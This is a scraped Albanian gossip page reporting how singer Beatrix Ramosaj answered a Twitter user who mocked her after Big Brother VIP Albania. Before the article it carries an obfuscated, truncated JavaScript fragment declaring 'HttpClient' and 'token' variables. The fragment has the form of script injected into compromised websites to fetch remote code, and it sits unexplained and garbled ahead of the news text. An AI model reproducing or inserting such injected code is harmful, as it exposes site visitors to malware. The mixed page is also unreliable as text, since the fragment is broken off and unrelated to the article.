;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

Fiks kështu si Beatrix duhet t’u përgjigjemi bullizuesve keqdashës

By

Që kur doli nga shtëpia e famshme “Big Brother VIP Albania”, Beatrix Ramosaj ka provuar edhe anën e keqe të vëmendjes.

Në vazhdimësi, krahas shumë komenteve të mira dhe përkrahjes pafund nga ndjekësit e saj, këngëtarja është ballafaquar edhe me komente keqdashëse.

Ndonëse komente të tilla ka efekt negativ tek personi që i drejtohen, Beatrix gjithmonë i ka injoruar ose ka reaguar me shumë dinjitet – si këtë herë të fundit.

Një përdorues në Twitter ka shkruar, “Ndjej sikur nuk e bullizuam këtë vajzë mjaftueshëm”.

Po i njëjti përdorues ka marrë përgjigje nga këngëtarja në postim.

“Vazhdo, më bullizo…Unë jam më e fortë nga ç’mendon ti! Thjesht shpresoj që një ditë fëmijët e tu të mos lexojnë gjërat që ke shkruar“, ka shkruar Beatrix. /Prive.al

Artikuj të ngjashëm